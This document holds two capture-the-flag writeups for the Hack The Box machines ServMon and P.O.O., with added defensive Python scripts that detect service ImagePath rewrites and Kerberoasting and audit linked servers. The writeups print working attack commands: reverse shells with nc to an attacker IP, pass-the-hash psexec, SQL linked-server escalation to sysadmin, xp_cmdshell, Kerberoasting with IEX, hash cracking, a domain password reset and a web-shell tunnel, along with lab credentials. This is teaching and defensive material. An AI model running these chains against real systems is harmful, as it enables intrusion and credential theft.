htb-servmon-nl

htb-servmon

As always we start with an nmap scan.

We can log in to FTP anonymously and find confidential.txt in ftp://10.10.10.184/Nathan:

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

The LFI exploit is https://www.exploit-db.com/exploits/47774, which lets us read Passwords.txt from Nathan's Desktop.

So we have the passwords.

L1k3B1gBut7s@W0rk is the password for the user Nadine (it works for the SSH service).

ssh nadine@10.10.10.184, with password L1k3B1gBut7s@W0rk

Next we upload nc.exe to the box.

Then we use https://www.exploit-db.com/exploits/46802 against NSClient++:

C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
This is the password for the NSClient++ login page on port 8443.

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:

Another way:

Enumerating the current user shows that it is a member of the "Server Operators" group, which can read and write system services: it can change the configuration of services that run with SYSTEM permissions and start them. That gives the idea: find a SYSTEM service that has not been started, change its binary to a trojan or nc, and then start it:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>
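Detection logic for the ImagePath rewrite above, added here as an example and not part of the original writeup: it runs over Sysmon Event ID 13 (registry value set) records, constructed as sample data in the block, and flags ImagePath values that point to a user-writable or untrusted location, noting when the writer was not a SYSTEM account. Field names follow Sysmon's event schema; the service names other than SensorDataService and the account SERVMON\Administrator are assumptions.

```python
"""Flag service ImagePath rewrites of the kind used above (Server Operators -> SYSTEM).

Input: registry value-set records (Sysmon Event ID 13) as a SIEM export would hand
them over. Every record below is constructed sample data, not a log from the box.
"""
import re
from typing import Dict, List

IMAGEPATH_RE = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)
# First token ending in .exe/.sys/.dll, so arguments after an unquoted path are dropped.
EXE_RE = re.compile(r"^(.*?\.(?:exe|sys|dll))(?:\s|$)", re.IGNORECASE)

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Directories a low-privileged user can normally write to; a service binary here is
# suspicious even when the path sits under C:\Windows (the nc.exe case above).
WRITABLE_SEGMENTS = ("\\temp\\", "\\tmp\\", "\\users\\", "\\programdata\\")
SYSTEM_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                   "nt authority\\network service"}


def executable_from_imagepath(image_path: str) -> str:
    """Return the lower-cased, absolute executable named by a service ImagePath value."""
    value = image_path.strip()
    if value.startswith('"'):
        exe = value[1:].split('"', 1)[0]
    else:
        match = EXE_RE.match(value)
        exe = match.group(1) if match else value.split(" ", 1)[0]
    exe = exe.lower()
    # Forms the service control manager accepts for binaries under the Windows directory.
    if exe.startswith("\\??\\"):
        exe = exe[4:]
    if exe.startswith(("%systemroot%\\", "%windir%\\")):
        exe = "c:\\windows\\" + exe.split("\\", 1)[1]
    elif exe.startswith("\\systemroot\\"):
        exe = "c:\\windows\\" + exe[len("\\systemroot\\"):]
    elif exe.startswith("system32\\"):
        exe = "c:\\windows\\" + exe
    return exe


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """One finding per ImagePath change whose target binary is not where a service binary belongs."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        if ev.get("EventID") != "13":
            continue
        match = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if not match:
            continue
        exe = executable_from_imagepath(ev.get("Details", ""))
        reasons: List[str] = []
        if any(seg in exe for seg in WRITABLE_SEGMENTS):
            reasons.append("binary in user-writable location")
        elif not exe.startswith(TRUSTED_ROOTS):
            reasons.append("binary outside trusted roots")
        if not reasons:
            continue
        # The writeup's change came from reg.exe run as Nadine, not from the SCM as SYSTEM.
        if ev.get("User", "").lower() not in SYSTEM_ACCOUNTS:
            reasons.append("modified by non-SYSTEM account")
        findings.append({"service": match.group(1), "user": ev.get("User"),
                         "exe": exe, "reasons": reasons})
    return findings


SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed sample records
    {"EventID": "13", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\ImagePath",
     "Details": "%SystemRoot%\\System32\\svchost.exe -k netsvcs -p"},
    {"EventID": "13", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\storahci\\ImagePath",
     "Details": "\\SystemRoot\\System32\\drivers\\storahci.sys"},
    {"EventID": "13", "User": "SERVMON\\Administrator", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorAgent\\ImagePath",
     "Details": "\"C:\\Program Files\\Vendor Agent\\agent.exe\" --service"},
    {"EventID": "13", "User": "SERVMON\\Nadine", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SensorDataService\\ImagePath",
     "Details": "C:\\Windows\\Temp\\nc.exe 10.10.14.13 9876 -e cmd"},
    {"EventID": "13", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\AgentSvc\\ImagePath",
     "Details": "D:\\Tools\\agent.exe"},
    {"EventID": "13", "User": "SERVMON\\Nadine", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SensorDataService\\Start",
     "Details": "DWORD (0x00000003)"},  # not an ImagePath change, ignored
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding['service']}: {finding['exe']} ({finding['user']}) - "
              f"{', '.join(finding['reasons'])}")
```

In production the same rule should also be fed Security event 4697 and System event 7045 (service installed), since `sc create` does not go through reg.exe.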

Author : Puckiestyle

htb-endgame-poo

Hack the Box – P.O.O. (writeup published as the box retired in June 2020)

As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb.
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11

We have discovered a few open ports: HTTP on port 80 and MSSQL on 1433. I chose not to perform a UDP scan at this point in the exercise.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones to look at seemed to be the 'admin' folder and the '.DS_Store' file: admin indicates an area of privilege, and .DS_Store files generally hold information about the folder they reside in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing that .DS_Store files contain directory information, I read the file to see what it contained. I did this using https://github.com/lijiejie/ds_store_exp

python ds_store_exp.py http://10.13.38.11/.DS_Store

We have some interesting directories. I ran the IIS ShortName Scanner (https://github.com/irsdl/IIS-ShortName-Scanner) to see if I could find anything interesting, and one specific directory returned good information.

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.


These seemed to be connection details for a SQL database, and we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#


SQL Access
For SQL access, I booted up my Windows machine and used SQL Server Management Studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag; SELECT * FROM dbo.flag;
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}

Creating the SQL user puckie in SQL Server Management Studio (the queries are executed through the linked server COMPATIBILITY\POO_CONFIG, which links back to COMPATIBILITY\POO_PUBLIC):

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
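An audit of the linked-server loop used above, added here as an example and not the author's code: it walks (instance, login) states over the link mappings, reports which sysadmin contexts a low-privileged login such as external_user can reach, and builds the nested EXEC ... AT chain for the same suser_name() probe. The mappings, the linkuser login and the third instance POO_HR are constructed assumptions; the real mapping on the box is not shown on the page.

```python
"""Audit which sysadmin contexts a low-privileged SQL login can reach over linked servers.

LINK_LOGINS is constructed sample data modelled on the two-instance loop the queries
above go through (POO_PUBLIC -> POO_CONFIG -> POO_PUBLIC); the real mapping on the box
is not shown on the page. A real audit fills it from sys.servers and sys.linked_logins
on every instance.
"""
from collections import deque
from typing import Dict, List, Optional, Tuple

State = Tuple[str, str]  # (instance, login the remote query executes as)

PUBLIC = "COMPATIBILITY\\POO_PUBLIC"
CONFIG = "COMPATIBILITY\\POO_CONFIG"
HR = "COMPATIBILITY\\POO_HR"  # hypothetical third instance, to show a login-specific mapping

# (local_instance, linked_instance, local_login or "*" for all logins, uses_self, remote_login)
# mirrors sys.linked_logins: local_principal_id 0 = all logins, uses_self_credential, remote_name
LINK_LOGINS = [
    (PUBLIC, CONFIG, "*", False, "linkuser"),   # every PUBLIC login reaches CONFIG as linkuser
    (CONFIG, PUBLIC, "*", False, "sa"),         # every CONFIG login hops back to PUBLIC as sa
    (CONFIG, HR, "*", False, "hr_reader"),      # default mapping for HR
    (CONFIG, HR, "sa", True, None),             # ...but sa reaches HR as itself
]
# (instance, login) pairs holding the sysadmin role (from sys.server_role_members)
SYSADMINS = {(PUBLIC, "sa"), (CONFIG, "sa"), (HR, "sa")}


def next_hops(state: State) -> List[State]:
    """Every linked server reachable from `state`, with the login the hop runs as.
    A mapping for the specific local login takes precedence over the "*" mapping."""
    instance, login = state
    chosen: Dict[str, Tuple[bool, Optional[str]]] = {}
    for local, linked, local_login, uses_self, remote in LINK_LOGINS:
        if local != instance or local_login not in ("*", login):
            continue
        if local_login == login or linked not in chosen:
            chosen[linked] = (uses_self, remote)
    return [(linked, login if uses_self else remote)
            for linked, (uses_self, remote) in chosen.items()]


def find_escalations(start: State) -> List[List[State]]:
    """Breadth-first search over (instance, login) states; returns the shortest path to
    each sysadmin context reachable from `start`. The visited set handles the loop."""
    parent: Dict[State, Optional[State]] = {start: None}
    queue = deque([start])
    paths: List[List[State]] = []
    while queue:
        current = queue.popleft()
        if current in SYSADMINS and current != start:
            paths.append(_trace(parent, current))
        for nxt in next_hops(current):
            if nxt not in parent:
                parent[nxt] = current
                queue.append(nxt)
    return paths


def _trace(parent: Dict[State, Optional[State]], state: Optional[State]) -> List[State]:
    path: List[State] = []
    while state is not None:
        path.append(state)
        state = parent[state]
    return path[::-1]


def nested_exec(hops: List[str], query: str) -> str:
    """Build the EXEC (...) AT [server] chain that runs `query` at the end of `hops`;
    each nesting level doubles the single quotes, as the queries above do by hand."""
    statement = query
    for server in reversed(hops):
        escaped = statement.replace("'", "''")
        statement = f"EXEC ('{escaped}') at [{server}]"
    return statement


if __name__ == "__main__":
    for path in find_escalations((PUBLIC, "external_user")):
        print(" -> ".join(f"{inst} as {who}" for inst, who in path))
        # probe the chain with the same suser_name() check the writeup uses
        print(nested_exec([inst for inst, _ in path[1:]], "select suser_name()"))
```

The mitigation this audit points at is the mapping itself: a link whose default login is sysadmin on the other side turns every login on the source instance into sysadmin.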

 

SHELL Access
I needed to enable xp_cmdshell


Now that I had sysadmin rights on the SQL Server, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
I used python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.


After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page


Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


POO{4882bd2ccfd4b5318978540d9843729f}

IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name="Block network access for R local user accounts in SQL Server instance POO_PUBLIC"


And then I noticed an IPv6 address and another adapter.


I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-WinRM to get the fourth flag:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}

I wanted to see what I could find out about the domain. Knowing that the box is on a domain, I was hoping for some Kerberos service tickets that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier.

Kerberoasting
I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This came back with two accounts.

This one was named p00_hr.

This one was named p00_adm.


I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

Hashcat
I proceeded to run these two hashes through hashcat with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.
p00_hr:Password123!

However, when I ran the p00_adm account through rockyou, it did not return any results. I then decided to run the hash through all passwords found in all text files within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r

Now that I had both passwords cracked, I needed to try and gain access to the domain controller, which was on 172.20.128.53.
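The defender's view of the Invoke-Kerberoast run above, added here as an example and not part of the writeup: it scans Security event 4769 records (constructed sample data) for one client requesting RC4 (etype 0x17) service tickets for several user-account SPNs within a short window. The requester POO\svc_sql, the client addresses and the timestamps are assumptions.

```python
"""Spot a Kerberoast sweep in Security event 4769 (service ticket requested) records.

Invoke-Kerberoast, as run above, asks for an RC4 (etype 0x17) service ticket for every
SPN account it finds, so one client requesting RC4 tickets for several user-account SPNs
within seconds is the signal. All records below are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; 0x11/0x12 are AES


def roastable(service_name: str) -> bool:
    """Only user accounts with SPNs matter: krbtgt and machine accounts ($) have random keys."""
    return service_name.lower() != "krbtgt" and not service_name.endswith("$")


def detect_kerberoast(events: List[Dict[str, str]], window_seconds: int = 60,
                      min_services: int = 2) -> List[Dict[str, object]]:
    """Per (client IP, requesting account): largest set of distinct roastable services
    that received RC4 tickets inside any window of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    by_client = defaultdict(list)  # (IpAddress, requester) -> [(time, service)]
    for ev in events:
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue  # only successful ticket issues count
        if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        if not roastable(ev.get("ServiceName", "")):
            continue
        key = (ev["IpAddress"], ev["TargetUserName"])
        by_client[key].append((datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    findings: List[Dict[str, object]] = []
    for (ip, requester), requests in by_client.items():
        requests.sort()
        best: set = set()
        start = 0
        for end, (t_end, _) in enumerate(requests):  # sliding window over sorted requests
            while t_end - requests[start][0] > window:
                start += 1
            in_window = {svc for _, svc in requests[start:end + 1]}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_services:
            findings.append({"client": ip, "requester": requester, "services": sorted(best)})
    return findings


def _ev(time: str, requester: str, ip: str, service: str, etype: str, status: str = "0x0") -> Dict[str, str]:
    return {"EventID": "4769", "TimeCreated": time, "TargetUserName": requester,
            "IpAddress": ip, "ServiceName": service, "TicketEncryptionType": etype, "Status": status}


SAMPLE_EVENTS = [  # constructed, modelled on the accounts named in the writeup
    _ev("2020-04-16T05:40:02", "POO\\mr3ks", "172.20.128.53", "DC$", "0x12"),        # AES, machine
    _ev("2020-04-16T05:41:10", "POO\\svc_sql", "172.20.128.10", "p00_hr", "0x17"),
    _ev("2020-04-16T05:41:10", "POO\\svc_sql", "172.20.128.10", "p00_adm", "0x17"),
    _ev("2020-04-16T05:41:11", "POO\\svc_sql", "172.20.128.10", "COMPATIBILITY$", "0x17"),
    _ev("2020-04-16T05:55:30", "POO\\svc_sql", "172.20.128.10", "p00_dev", "0x17"),  # outside 60 s
    _ev("2020-04-16T06:00:00", "POO\\appsvc", "172.20.128.20", "p00_hr", "0x17"),    # single, legit
    _ev("2020-04-16T06:01:00", "POO\\guest", "10.13.38.11", "p00_adm", "0x17", "0x6"),  # failed
]

if __name__ == "__main__":
    for finding in detect_kerberoast(SAMPLE_EVENTS):
        print(f"{finding['client']} ({finding['requester']}): {', '.join(finding['services'])}")
```

Moving the SPN accounts to AES-only keys (or gMSAs) removes the RC4 signal and, more importantly, the fast offline crack that recovered p00_hr and p00_adm above.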

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1


Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account named mr3ks.


PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1 c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx tunnel shell into the web root folder.

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx


I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now to create my tunnel with reGeorg.

python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx


I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type:
dism /online /enable-feature /featurename:NetFx4Extended-ASPNET45 /All

Extra

kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL>


msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 - - POO\Administrator
[*] 10.13.38.11:1433 - - POO\Guest
[*] 10.13.38.11:1433 - - POO\krbtgt
[*] 10.13.38.11:1433 - - POO\DefaultAccount
[*] 10.13.38.11:1433 - - POO\Domain Admins
[*] 10.13.38.11:1433 - - POO\Domain Users
[*] 10.13.38.11:1433 - - POO\Domain Guests
[*] 10.13.38.11:1433 - - POO\Domain Computers
[*] 10.13.38.11:1433 - - POO\Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cert Publishers
[*] 10.13.38.11:1433 - - POO\Schema Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Admins
[*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 - - POO\Protected Users
[*] 10.13.38.11:1433 - - POO\Key Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 - - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\mr3ks
[*] 10.13.38.11:1433 - - POO\DC$
[*] 10.13.38.11:1433 - - POO\DnsAdmins
[*] 10.13.38.11:1433 - - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 - - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 - - POO\p00_hr
[*] 10.13.38.11:1433 - - POO\p00_dev
[*] 10.13.38.11:1433 - - POO\p00_adm
[*] 10.13.38.11:1433 - - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 - xp_cmdshell is Enabled
[*] 10.13.38.11:1433 - remote access is Enabled
[*] 10.13.38.11:1433 - allow updates is Not Enabled
[*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 - Database name:master
[*] 10.13.38.11:1433 - Database Files for master:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 - Database name:tempdb
[*] 10.13.38.11:1433 - Database Files for tempdb:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 - Database name:POO_PUBLIC
[*] 10.13.38.11:1433 - Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 - No Disabled Logins Found
